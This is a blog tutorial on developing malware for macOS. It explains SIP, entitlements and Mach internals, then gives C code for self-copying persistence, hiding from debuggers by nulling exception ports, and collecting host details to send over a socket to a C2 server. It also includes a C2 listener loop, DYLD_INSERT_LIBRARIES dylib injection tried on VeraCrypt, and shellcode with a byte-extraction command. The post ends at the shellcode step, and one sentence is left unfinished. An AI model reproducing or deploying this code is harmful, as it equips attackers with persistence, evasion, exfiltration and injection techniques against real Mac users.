In today’s post, we’ll explore the process of designing and developing malware for macOS, using a classic approach to understanding Apple’s internals. This article was originally written in late 2022 and tested on an older version of macOS. I kind of forgot about it until later this year, when I revisited it. Before publishing, I decided to test the techniques on macOS Catalina and Monterey. We’ll also cover SIP and some other security features. Keep in mind that the techniques you’ll see here are fairly well known, involve common tricks, and are often heavily restricted by sandboxing. Most of them require root access to work.

The goal of this article is to introduce certain techniques and provide an overview of macOS architecture, encouraging further research rather than just delivering a typical ‘for educational purposes only’ write-up. I still plan to expand on this eventually, but don’t hold me to it just yet.

To follow along, you should have a basic understanding of C programming, and some familiarity with low-level assembly language. While the topics may be advanced, I’ll do my best to present them smoothly.

Alright, let’s move on.

Let’s start by understanding the macOS architecture and its security features. Next, we’ll take a look at the internals, covering key elements like the Mach API and the kernel, and we’ll walk through some basic, easy-to-understand system calls. After that, we’ll introduce a dummy malware sample. Later, we’ll explore code injection techniques and how they’re used in malware. To wrap up, we’ll demonstrate a basic implementation of shellcode injection. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.

Background

A little background from the internet: the Mac OS X kernel (XNU) is an operating system kernel with a unique lineage, merging the research-oriented Mach microkernel with the more traditional and contemporary FreeBSD monolithic kernel. The Mach microkernel combines a powerful abstraction, Mach message-based interprocess communication (IPC), with several cooperating servers to constitute the core of an operating system. Responsible for managing separate tasks within their own address spaces, each comprising multiple threads, the Mach microkernel also features default servers that offer services like virtual memory paging and system clock management.

However, the Mach microkernel alone lacks crucial functionalities such as user management, file systems, and networking. To address this, the Mac OS X kernel incorporates a graft of the FreeBSD kernel, specifically its top-half (system call handlers, file systems, networking, etc.), ported to run atop the Mach microkernel.

OS X

First of all, before talking about development, it is necessary to understand the basics of the OS. We are going to touch on its security features, with a special focus on SIP (System Integrity Protection).

System Integrity Protection (SIP) is a fundamental mechanism that protects critical operating system files, directories, and processes from being modified or tampered with, even by the root user. It enforces write restrictions on protected locations such as /System, /bin, /sbin, and /usr (except /usr/local), which prevents unauthorized modifications that may damage the operating system. SIP also enforces strict rules for system extensions and kernel drivers. For instance, kexts must be signed either by Apple or by a developer with a valid Developer ID. That means the system only loads trusted, signed extensions into the kernel, which adds another layer of security.

As can be seen, SIP is enabled, which means the operating system is currently protected by System Integrity Protection. Some directories carry a flag called “restricted”, which marks those particular areas as protected by SIP. SIP protection does not necessarily extend to every subdirectory of a protected directory.

For certain paths, macOS (since Catalina) relies on firmlinks. These are special links, similar in spirit to symbolic links, that join directories on the read-only, SIP-protected system volume to their writable counterparts on the data volume. To applications and scripts, a path that crosses a firmlink looks like an ordinary directory, so they can do their job without any special accommodations.

That solves a lot of compatibility issues for both developers and users while keeping the benefits of SIP. It strikes a balance between protecting the system and meeting the needs of applications and scripts that expect the traditional directory layout. A good example is /usr/local, which remains writable through a firmlink, leaving room to install and manage software and scripts in that directory without weakening the protected system areas.

macOS balances granting an application the permissions it needs to function properly with keeping the operating system secure. It does this through entitlements, which are permissions macOS consults when deciding which system resources an application can access. Entitlements are written as a property list and embedded in the application’s code signature when it is signed; they are separate from Info.plist, which is part of the app’s bundle and contains general metadata about the app.

Application configuration, settings, and preferences are typically stored in plist files on macOS. A plist holds key-value pairs and can be saved in either XML or binary format.

<?xml version="1.0" encoding="UTF-8"?>  
<plist version="1.0">  
<dict>  
<key>com.apple.security.app-sandbox</key>  
<true/>  
<key>com.apple.security.files.user-selected.read-only</key>  
<true/>  
<key>com.apple.security.network.client</key>  
<true/>  
</dict>  
</plist>  
  

com.apple.security.app-sandbox: Enables the App Sandbox for the application, restricting it to the resources its other entitlements grant.
com.apple.security.files.user-selected.read-only: Grants read-only access to files the user explicitly selects, for example through an Open dialog.
com.apple.security.network.client: Allows the application to open outgoing network connections, that is, to act as a network client.
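
To make the key/value structure concrete, here is a minimal sketch in C that scans an entitlements plist held in memory and reports whether a boolean key is set. The helper name entitlement_is_true is hypothetical, and the plain substring scan assumes the simple XML layout shown above; a real tool would use a proper plist parser rather than string matching.

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Hypothetical helper: returns true when `key` appears as a <key> element
 * in the XML plist text and the value element that follows is <true/>.
 * This is a naive substring scan, not a real plist parser. */
bool entitlement_is_true(const char *plist_xml, const char *key)
{
    char needle[256];
    size_t key_len = strlen(key);

    /* "<key>" + key + "</key>" plus the terminator must fit in the buffer. */
    if (key_len + sizeof("<key></key>") > sizeof(needle))
        return false;

    strcpy(needle, "<key>");
    strcat(needle, key);
    strcat(needle, "</key>");

    const char *p = strstr(plist_xml, needle);
    if (p == NULL)
        return false;

    /* Skip the key element and any whitespace before the value. */
    p += strlen(needle);
    while (*p != '\0' && isspace((unsigned char)*p))
        p++;

    return strncmp(p, "<true/>", 7) == 0;
}
```

Called on the plist above, entitlement_is_true(xml, "com.apple.security.app-sandbox") would report the sandbox entitlement as set, while a key that is absent simply yields false.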

There is more to cover here, such as Gatekeeper, sandboxing, app bundles, etc., but these are the important security mechanisms that concern us for development. Now let’s talk a little about internals. You may wonder why the internal architecture is so important to focus on. Even though I am not planning on developing a rootkit yet, knowing your OS inside and out from the developer’s side of things is kind of necessary. After all, we are writing software.

Mach APIs

Let’s take a quick look at Mach. It was initially designed as a kernel focused on communication and multiprocessing, with the goal of setting up the foundation for various operating systems. Mach used a microkernel architecture, keeping core OS services like file systems, I/O, memory management, and networking separate from the kernel.

The XNU kernel, which stands for “X is not UNIX,” powers macOS. Positioned at the heart of the system, XNU supports Darwin and the rest of the software stack.

XNU is a hybrid operating system, combining the minimalist Mach microkernel’s hardware/IO interface with elements from the FreeBSD kernel and its POSIX-compliant API. This blend can make understanding how programs map to processes in virtual memory on macOS a little tricky. For instance, the term “thread” might refer to either POSIX API pthreads from BSD or the basic unit of execution within a Mach task. Additionally, there are two different sets of system calls: Mach traps, traditionally mapped to negative numbers, and BSD syscalls, mapped to positive numbers. On x86_64 the distinction is encoded as a class in the upper bits of the call number instead, which is why BSD calls look like 0x2000004.
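
On x86_64, XNU packs a class into the upper byte of the system call number, which is where values like 0x2000004 (BSD write) in the assembly later in this post come from. The sketch below reproduces that encoding; the class values and the 24-bit shift follow XNU’s syscall_sw.h header, while the XNU_* names and both helper functions are made up for illustration.

```c
#include <stdint.h>

/* Class values used by XNU on x86_64 (names here are illustrative). */
enum { XNU_CLASS_MACH = 1, XNU_CLASS_UNIX = 2 };

#define XNU_CLASS_SHIFT 24
#define XNU_NUMBER_MASK 0x00FFFFFFu

/* Combine a class and a call number into the value placed in rax. */
uint32_t xnu_syscall_number(uint32_t cls, uint32_t number)
{
    return (cls << XNU_CLASS_SHIFT) | (number & XNU_NUMBER_MASK);
}

/* Recover the class from an encoded call number. */
uint32_t xnu_syscall_class(uint32_t encoded)
{
    return encoded >> XNU_CLASS_SHIFT;
}
```

With this, xnu_syscall_number(XNU_CLASS_UNIX, 4) gives the encoded value for BSD write and xnu_syscall_number(XNU_CLASS_UNIX, 1) the one for exit.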

Mach provides a virtual machine interface that abstracts system hardware—a feature common to many operating systems. Its core kernel is designed to be simple and extensible, featuring an Inter-Process Communication (IPC) mechanism that supports many kernel services. Notably, Mach integrates IPC capabilities with its virtual memory subsystem, leading to optimizations and simplifications throughout the OS.

The term “tasks” is used instead of “processes.” Tasks are similar to processes in that they encompass all the resources needed to run a program. Technically, Mach calls its processes “tasks,” though the concept of a BSD-style process that includes a Mach task still exists. Resources within a task include:

A virtual address space
Inter-process communication (IPC) port rights
One or more threads

Ports serve as an inter-task communication mechanism, using structured messages to transmit information between tasks. Living solely in kernel space, ports act like P.O. boxes, albeit with restrictions on who may send messages. Within a task, ports are identified by task-specific 32-bit numbers.

Threads are units of execution scheduled by the kernel. macOS supports two thread types (Mach threads and pthreads), depending on whether the code originates from user or kernel mode. Mach threads reside at the OS’s lowest level in kernel mode, while pthreads from the BSD realm execute programs in user mode. (More on this later.)

Mach redefines the traditional Unix notion of a process into two components: a task and a thread. In the kernel, a BSD process aligns with a Mach task. A task serves as a framework for executing threads, encapsulating resources and defining a program’s protection boundary. Mach ports, versatile abstractions, facilitate IPC mechanisms and resource operations.

IPC messages in Mach are exchanged between threads for communication, carrying actual data or pointers to out-of-line data. Message transfer is asynchronous, with port capabilities exchanged through messages.

Mach’s virtual memory system encompasses machine-independent components like address maps and memory objects, alongside machine-dependent elements like the physical map. Memory objects serve as containers for data mapped into a task’s address space, managed by various pagers handling distinct memory types. Exception ports, assigned to each task and thread, facilitate exception handling, allowing multiple handlers to suspend affected threads, process exceptions, and resume or terminate threads accordingly.

Let’s explore the basics of Mach system calls, including retrieving system information and performing code injection. This will provide a fundamental understanding of interacting with macOS. By the way, a system call is a kernel function invoked from user space. It can involve tasks like writing to a file descriptor or exiting a program.

Baby Steps

If we check out the Mach IPC Interface or the Apple documentation, we’ll find a Mach system call that’s really useful for getting basic information about the host system. I also recommend taking a look at OS Internals, Volume I: User Mode.

It tells us stuff like how many CPUs there are, both maximum and available, the physical and logical CPUs, memory size, and the max memory size. This call is host_info(), and it’s super useful for getting details about a host, like what kind of processors are installed, how many are currently available, and the total memory size.

Now, like a lot of Mach “info” calls, host_info() needs a flavor argument to specify what kind of info you want. For instance:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t *host_info_count);

HOST_BASIC_INFO: Returns basic system information.
HOST_SCHED_INFO: Provides scheduler-related data.
HOST_PRIORITY_INFO: Offers scheduler-priority-related information.

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.
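
As a rough sketch of how the HOST_BASIC_INFO flavor is used, the following wraps host_info() in a small helper. The helper name basic_host_info is hypothetical, and the #ifdef guard is only there so the file still compiles on systems without the Mach API, where it simply reports failure.

```c
#include <stdio.h>

#ifdef __APPLE__
#include <mach/mach.h>
#include <mach/mach_error.h>
#include <mach/mach_host.h>
#endif

/* Hypothetical helper: fills in CPU counts and memory size using
 * host_info(HOST_BASIC_INFO). Returns 0 on success, -1 on failure or
 * when built on a platform without the Mach API. */
int basic_host_info(int *max_cpus, int *avail_cpus, unsigned long long *max_mem)
{
#ifdef __APPLE__
    host_basic_info_data_t info;
    /* In/out: capacity of `info` on entry, amount filled in on return. */
    mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT;
    mach_port_t host = mach_host_self();

    kern_return_t kr = host_info(host, HOST_BASIC_INFO,
                                 (host_info_t)&info, &count);

    /* mach_host_self() hands us a send right; release it when done. */
    mach_port_deallocate(mach_task_self(), host);

    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "host_info: %s\n", mach_error_string(kr));
        return -1;
    }

    *max_cpus = info.max_cpus;
    *avail_cpus = info.avail_cpus;
    *max_mem = info.max_mem;
    return 0;
#else
    (void)max_cpus;
    (void)avail_cpus;
    (void)max_mem;
    return -1;
#endif
}
```

Note that the count argument is passed by pointer: the kernel uses it both to learn how much room the caller provided and to report how much it actually wrote.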

If we want to learn more about system calls, we need something different. How about something that acts more like malware? But let’s keep it simple at first. We can start by writing code that writes a copy of itself to either /usr/local/bin/ (when running as root) or the user’s home directory.

To achieve this kind of behavior in general, we need task operations, because we need to control another process and access system processes. Mach calls such as pid_for_task(), task_for_pid(), and task_name_for_pid() convert between Mach task ports and Unix PIDs, while mach_task_self() returns the port for the current task. The first three essentially bypass the capability model, so macOS restricts them through UID checks, entitlements, SIP, and so on. They are not documented as part of a public API and are privileged, typically usable only by root or by members of the procview group. This poses a challenge, because malware would need elevated privileges, or to run under a privileged account, for them to work.

Thus, we can’t use task_for_pid on Apple platform binaries due to SIP. If it were permitted, we would hold the task port and could do essentially anything we want with the target, including what I’m about to explain. So for this example we’ll use mach_task_self(), which typically does not require privileges. It returns the port for the current task, subject to the security policies enforced.

void hide_process() {
  mach_port_t task_self = mach_task_self();
  kern_return_t kr;

  // Less visible to debuggers and handlers.
  kr = task_set_exception_ports(
    task_self, 
    EXC_MASK_ALL, 
    MACH_PORT_NULL, 
    EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, 
    THREAD_STATE_NONE 
  );

  if (kr != KERN_SUCCESS) {
    exit(EXIT_FAILURE);
  }

  printf("Process is now hidden.\n");

}

The function obtains the task port for the current process using mach_task_self(), which essentially retrieves a send right to a task port. In the Mach kernel, a task port represents a task, and sending a message to this port enables actions to be performed on the corresponding task.

Next, it sets the task’s exception ports with task_set_exception_ports(), directing every exception type to a null Mach port, with the aim of making the process less visible to debuggers and other forms of external monitoring. If the call fails, the process exits with a failure status; otherwise it prints a confirmation message.

int main(int argc, char *argv[]) {
    struct passwd *pw = getpwuid(getuid());
    const char *home_dir = pw->pw_dir;

    char home_file_path[PATH_MAX_LENGTH];
    snprintf(home_file_path, sizeof(home_file_path), "%s/.%s", home_dir, FILE_NAME);

    if (geteuid() == 0) {
        const char *system_file_path = "/usr/local/bin/" FILE_NAME;
        if (access(system_file_path, F_OK) != 0) {
            copy_file(argv[0], system_file_path);
        }
    } else {
        if (access(home_file_path, F_OK) != 0) {
            copy_file(argv[0], home_file_path);
            greet_user();
        }
    }

    // hide_process(); /* For show */
    // remove(argv[0]);

    return EXIT_SUCCESS;
}

So the logic is as follows: it first checks whether it has root privileges by calling geteuid(). If it does, it copies itself to /usr/local/bin/, unless a copy already exists there. If it doesn’t have root privileges, it copies itself to a hidden file in the user’s home directory and, on a fresh copy, calls greet_user() to print "Hello, World!". The calls to hide_process() and remove(argv[0]), which would hide the process and delete the original binary, are commented out in this listing and are there for show.

This is far from being malware, but it lets you get familiar with the Mach API and with conducting low-level system operations.

0x100003e79 <+505>: callq  0x100003c50               ; hide_process
0x100003e7e <+510>: movq   0x17b(%rip), %rax         ; (void *)0x0000000000000000
0x100003e85 <+517>: movl   (%rax), %edi
0x100003e87 <+519>: movl   -0x18(%rbp), %esi
0x100003e8a <+522>: callq  0x100003ec6               ; symbol stub for: mach_port_deallocate
0x100003e8f <+527>: xorl   %edi, %edi
0x100003e91 <+529>: movl   %eax, -0x21ec(%rbp)
0x100003e97 <+535>: callq  0x100003eb4               ; symbol stub for: exit

Here we load our little bad program into a debugger. As you can see in the disassembly, there are instructions that correspond to our operations, such as the call to hide_process. You can also notice the cleanup operations being performed, such as deallocating the port and exiting the program.

The Naive Way

After infecting a new host, let’s ensure our malware notifies us of its presence by sending information about the host. This method might seem amateurish, and malware shouldn’t connect to a Command & Control server (C2) right away, but since we’re just exploring macOS as new territory, it’s a starting point. We collect system information such as the system name, release version, machine architecture, hardware model, user ID, home directory, and so on, and then send this information to the C2. For retrieving or modifying information about the system and environment, we can make use of sysctlbyname, documented on Apple’s developer site. This function lets us retrieve specific system information, such as the cache line size, directly from the kernel.

However, when it comes to System Owner/User Discovery, we typically access user-related data through standard POSIX interfaces like getpwuid(), relying on these interfaces as discussed before. To fetch the hardware model, we would replace "hw.cachelinesize" with "hw.model" in the sysctlbyname function call.

Next, we want to gather more information about the host, not just its hardware model. Now, you may wonder why we don’t just use the first example we introduced. Well, it’s simple: this is to showcase how we access user-related data through standard POSIX interfaces. However, if you want to add the hardware model to the above example, just use:

count = sizeof(model);
kr = sysctlbyname("hw.model", model, &count, NULL, 0);
EXIT_ON_MACH_ERROR("sysctl hw.model", 1);
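
When the size of a value is not known in advance, a common pattern is to call sysctlbyname() twice: once with a NULL buffer to learn the required length, then again to fetch the data. The sketch below wraps that pattern for string-valued names such as "hw.model". The helper name sysctl_string is hypothetical, and the #ifdef guard only keeps the file compilable on platforms without sysctlbyname(), where the helper returns NULL.

```c
#include <stdlib.h>
#include <string.h>

#ifdef __APPLE__
#include <sys/types.h>
#include <sys/sysctl.h>
#endif

/* Hypothetical helper: returns a malloc'd copy of a string-valued sysctl
 * (for example "hw.model"), or NULL on failure. The caller frees it. */
char *sysctl_string(const char *name)
{
#ifdef __APPLE__
    size_t len = 0;

    /* First call with a NULL buffer asks the kernel for the required size. */
    if (sysctlbyname(name, NULL, &len, NULL, 0) != 0 || len == 0)
        return NULL;

    char *value = malloc(len + 1);
    if (value == NULL)
        return NULL;

    /* Second call copies the value out; len is updated to the bytes written. */
    if (sysctlbyname(name, value, &len, NULL, 0) != 0) {
        free(value);
        return NULL;
    }

    value[len] = '\0';   /* defensive NUL termination */
    return value;
#else
    (void)name;          /* sysctlbyname() is not available here */
    return NULL;
#endif
}
```

A caller would print the result of sysctl_string("hw.model") and then free() it; an unknown name simply yields NULL.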

We also want to send some information such as the kernel version, which can point to known vulnerabilities usable for escalation. Here’s an example that uses the same function we used to get the hardware model:

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", &kernel_version, &len, NULL, 0) == 0) {
	send_data(sockfd, "\nKernel Version: ");
	send_data(sockfd, kernel_version);

Now let’s dump and send more information about the profile of the infected host, including details such as system name, architecture, login shell, home directory, and any other relevant data that could aid in further exploiting or maintaining access to the compromised system. We’ll use functions such as uname, getpwuid, and getgrgid. Let’s take a look at the code:

void system_info(int sockfd) {
  struct utsname sys_info;
  char kernel_version[BUF_SIZE];

  // Get system information
  if (uname( & sys_info) != 0) {
    send_error("Failed to get system information");
    return;
  }

  send_data(sockfd, "\nSystem Name: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nRelease Version: ");
  send_data(sockfd, sys_info.release);
  send_data(sockfd, "\nMachine Architecture: ");
  send_data(sockfd, sys_info.machine);
  send_data(sockfd, "\nOperating System: ");
  send_data(sockfd, sys_info.sysname);
  send_data(sockfd, "\nVersion: ");
  send_data(sockfd, sys_info.version);
}
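
The listing above only covers the uname() part. As a rough sketch of the getpwuid() and getgrgid() side, the following formats the current account’s details into a local buffer instead of a socket. The helper name describe_current_user and the output layout are assumptions made for illustration, not part of the original sample.

```c
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: formats the current user's account details into
 * `out`. Returns the number of characters written, or -1 if the lookup
 * fails or the buffer is too small. */
int describe_current_user(char *out, size_t out_size)
{
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL)
        return -1;

    /* The primary group may have no entry in the group database. */
    struct group *gr = getgrgid(pw->pw_gid);

    int n = snprintf(out, out_size,
                     "User: %s (uid %ld)\nGroup: %s (gid %ld)\n"
                     "Home directory: %s\nLogin shell: %s\n",
                     pw->pw_name, (long)pw->pw_uid,
                     gr ? gr->gr_name : "unknown", (long)pw->pw_gid,
                     pw->pw_dir, pw->pw_shell);

    /* snprintf reports the length it wanted; treat truncation as failure. */
    return (n < 0 || (size_t)n >= out_size) ? -1 : n;
}
```

Both lookups return pointers to static storage, so the values should be copied out (as snprintf does here) before calling getpwuid() or getgrgid() again.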

So, the function is pretty self-explanatory; it simply provides a snapshot of the system and user environment, which is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection,

Even so, deploying a dummy malware can give attackers a lot of useful information that could be used for future, more targeted attacks or for exploiting vulnerabilities in both the kernel and user space. Such malware can be multi-staged to maintain stealth and keep a low profile. For example, the initial stage might involve spreading the malware throughout the system and lying in wait for the next stage to activate. These sophisticated attacks are advanced and tough to detect, especially on platforms like macOS, where malware can stay hidden for years, no more though!!

Another type of information gathering employed by macOS malware, as seen in some reports, involves ‘LOLBins’ (Living off the Land Binaries). You can program the malware to simply execute /usr/sbin/system_profiler -nospawn -detailLevel full

This command alone saves the trouble and provides all the information about a host that an attacker can gather. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, so how do we transmit the data? We use a socket. This API allows us to send data to the connected endpoint, which in this case is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data, and on file I/O functions such as popen() and fgets() for reading command output before sending it. It’s pretty simple.

The C2 server is also simple, designed solely for handling incoming connections. It won’t have any defensive mechanisms to hide itself from the system where it’s running; this server is basic and for show only. Some encryption would be a good start.

The extraction module (ext) starts an autonomous thread listening for incoming connections from malware instances. Once connected, the module simply prints the content of the incoming connection, which is the information extracted by the client.

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected client, and then closes the connection before resuming listening for new connections:

Collecting data from client ...

System Name: Darwin
Release Version: 19.6.0
Machine Architecture: x86_64
Operating System: Darwin

Obviously, this will get flagged within seconds if there’s a security mechanism in place. Why, you may ask? Well, the behavior exhibited here screams malware, from establishing a connection to sending system information and continuously receiving and executing commands from a remote server. The network traffic pattern alone is a red flag. Plus, transmitting system information (user, OS version, architecture, installed apps, …) immediately after the connection is established is suspicious in itself. The good news is that most Mac users assume they’re safe by default, so they don’t entertain the idea that capable malware could go unnoticed.

This is just a tip and a simple overview of how dummy malware can serve as a learning tool before serving the actual malware.

Code Injection

Actually, exploring code injection deserves its own article, and I’ll include some resources at the end. However, for now, let’s focus on two techniques that I find quite effective. Let’s begin with the first technique, which involves leveraging environment variables, specifically DYLD_INSERT_LIBRARIES, for code injection.

DYLD_INSERT_LIBRARIES is actually a powerful feature that allows users to preload dynamic libraries into applications. Both developers and attackers can use it to get code loaded into a process at launch without modifying the original executable file; it is commonly used to intercept function calls, manipulate program behavior, or even introduce malicious functionality into a legitimate application. As we’re going to see, it’s basically a colon-separated list of dynamic libraries to load before the ones specified in the program. This lets you test new modules of existing dynamic shared libraries that are used in flat-namespace images by loading a temporary dynamic shared library with just the new modules.
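
Since the variable is just a colon-separated list, a process can inspect what it was asked to preload, which is handy on the defensive side. The sketch below splits such a value into its entries. The function names for_each_inserted_library and print_entry are hypothetical, and keep in mind that dyld may ignore or strip the variable for restricted binaries, so an empty result does not prove much on its own.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: splits a DYLD_INSERT_LIBRARIES-style value on ':'
 * and calls `visit` (if not NULL) for each non-empty entry.
 * Returns the number of entries found. */
int for_each_inserted_library(const char *value,
                              void (*visit)(const char *path, size_t len))
{
    int count = 0;

    if (value == NULL)
        return 0;

    while (*value != '\0') {
        size_t len = strcspn(value, ":");   /* length up to the next ':' */
        if (len > 0) {
            if (visit != NULL)
                visit(value, len);
            count++;
        }
        value += len;
        if (*value == ':')
            value++;                        /* skip the separator */
    }
    return count;
}

/* Example visitor: prints one entry per line. */
void print_entry(const char *path, size_t len)
{
    printf("  %.*s\n", (int)len, path);
}
```

A typical call would be for_each_inserted_library(getenv("DYLD_INSERT_LIBRARIES"), print_entry), with stdlib.h included for getenv(); passing NULL when the variable is unset is handled and yields zero entries.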

In simple terms, it will load any dylibs you specify in this variable before the program loads, essentially injecting a dylib into the application. So, for example:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))

void foo() {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

As you can see, we have a function foo() that prints a message to let us know that we successfully injected the library, plus a system() call that runs a shell to echo basically the same thing. The __attribute__((constructor)) attribute marks the function to run before the main function of the application into which we injected the dylib. Piece of cake, right? But how do we identify binaries vulnerable to environment variable injection? More on that later; first, let’s just try it on one of our previous programs. Compile the code as a dynamic library and run the target with the variable set.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

Et voilà. When a binary is affected, any dylibs specified in this variable are loaded before the program starts, essentially injecting a dylib into the application. This could potentially lead to privilege escalation, right? Not so fast: it does not work on Apple platform binaries. As of macOS 10.14, third-party developers can also opt in to a hardened runtime for their application, which can prevent the injection of dylibs using this technique.

So, basically, we can still perform injection when the application does not use the hardened runtime and therefore allows dylibs to be injected through the environment variable. Alternatively, injection can still work when the binary uses the hardened runtime but the developer released it with the appropriate entitlements. Let’s go over them one more time:

The com.apple.security.cs.disable-library-validation entitlement allows the process to load any dylib without checking who signed the binary and the library. This permission usually exists in programs that allow community-written plugins.
The com.apple.security.cs.allow-dyld-environment-variables entitlement loosens the hardened runtime restrictions and allows the use of DYLD_INSERT_LIBRARIES to inject a library.

Alright, on to possible target applications. For example, trying this on Safari.app won’t work, because it is hardened and lacks the matching entitlement.

But that doesn’t mean the application isn’t hardened, as there are other Hardened Runtime features that might not be visible in the entitlements. To speed things up, I found that the version of Veracrypt I have doesn’t use Hardened Runtime, so I’ll use it as an example throughout this article! Now, let’s try injecting it, but first…

__attribute__((constructor))

static void customConstructor(int argc, const char **argv)
{
printf("Foo!\n");
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

So, we simply print ‘foo’ and log a message using the syslog() function, which logs an error message indicating successful injection of a dynamic library (dylib) along with the name of the program. Let’s try it. If we see the following output, it seems that we’ve successfully loaded the library:

If we attempt to use DYLD_INSERT_LIBRARIES in another binary that is hardened and lacks the matching entitlement, we won’t be able to load the library, and consequently, we won’t see the desired output.

However, some internal components of macOS expect threads to be created using the BSD APIs and have all Mach thread structures and pthread structures set up properly. This can present challenges, especially with changes introduced in macOS 10.14+

To address this issue, I came across a piece of code called inject.c. From my understanding, the transition from Mach thread APIs to pthread APIs in macOS, particularly the initialization of thread structures, is what presents the challenge. However, the discovery of the _pthread_create_from_mach_thread function provides an alternative for initializing pthread structures from bare Mach threads.

For those interested, I’ve included examples demonstrating how to inject code to call dlopen and load a dylib into a remote mach task: Gist 1 & Gist 2

Alright, let’s discuss the second technique. It’s similar to methods used on Windows: process injection, which is the ability for one process to execute code in a different process. On Windows, this is often used to evade detection by antivirus software, for example, through a technique known as DLL hijacking, which lets code hide as part of a different executable. On macOS, this technique can have a huge impact due to the differences in permissions between applications.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group, and flags that determine which users are allowed to read, write, or execute that file. Two processes running as the same user have the same permissions; it is assumed there is no security boundary between them. Users are considered security boundaries; processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.
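
The owner and mode bits described above can be read with stat(). As a small sketch of that classic model, the helpers below render the nine permission bits and check the simplest case, an owner with the write bit set. The names mode_to_string and owner_can_write are hypothetical, and the check deliberately ignores root, group membership, ACLs, and SIP.

```c
#include <sys/stat.h>
#include <sys/types.h>

/* Hypothetical helper: writes the nine permission characters for `mode`
 * (for example "rwxr-xr-x") into `out`, which must hold 10 bytes. */
void mode_to_string(mode_t mode, char out[10])
{
    static const mode_t bits[9] = {
        S_IRUSR, S_IWUSR, S_IXUSR,
        S_IRGRP, S_IWGRP, S_IXGRP,
        S_IROTH, S_IWOTH, S_IXOTH
    };
    static const char flags[] = "rwxrwxrwx";

    for (int i = 0; i < 9; i++)
        out[i] = (mode & bits[i]) ? flags[i] : '-';
    out[9] = '\0';
}

/* Returns 1 if `uid` owns `path` and the owner-write bit is set,
 * 0 if not, and -1 if stat() fails. */
int owner_can_write(const char *path, uid_t uid)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;

    return st.st_uid == uid && (st.st_mode & S_IWUSR) != 0;
}
```

Under the classic model this owner check, together with the group and other bits, would be the whole story; with SIP in place, a path can carry permissive mode bits and still be unwritable.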

This was essentially the same security model as macOS until the introduction of .. yep, SIP (System Integrity Protection)

macOS Shellcode Injection

Alright, so we’re going to write a simple shellcode injection program where the malware’s host process injects shellcode into the memory of a remote process. But before we proceed, let’s write a simple shellcode.

Writing 64-bit assembly on macOS differs somewhat from ELF. Here, you just need to understand the macOS executable file format, known as Mach-O. However, for simplicity, we’ll stick with the x86_64 architecture and we can later use a linker for Mach-O executables.

A simple “Hello World” program starts by declaring two sections: .data and .text. The .data section is used for storing initialized data, while the .text section contains executable code. Then we define _main as the entry point of the program, followed by a jump to a label that we’ll call trick. At trick, a call instruction invokes the continue routine; the call pushes the address of the bytes that follow it, the string ‘Hello World!’, and continue pops that address into rsi. The first syscall writes the string to standard output, and the second syscall at the end exits the program.

section .data
section .text

global _main
	_main:

start:
	jmp trick

continue:
	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
	
trick:
	call continue
	db "Hello World!", 0, 0

Alright, it’s time to compile. I typically use NASM for assembling my code. Remember what I mentioned about using the linker to create Mach-O executables? Well, after assembling the code with NASM, we’ll need to link it using ld. This linker not only brings together the assembled code but also incorporates necessary system libraries.

~ > ./nasm -f macho64 Hello.asm -o Hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Now, to turn this into something we can use for injection, we need the raw machine code as a string of hexadecimal bytes: the exact sequence of instructions that the processor will execute. For this, we can use objdump.

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

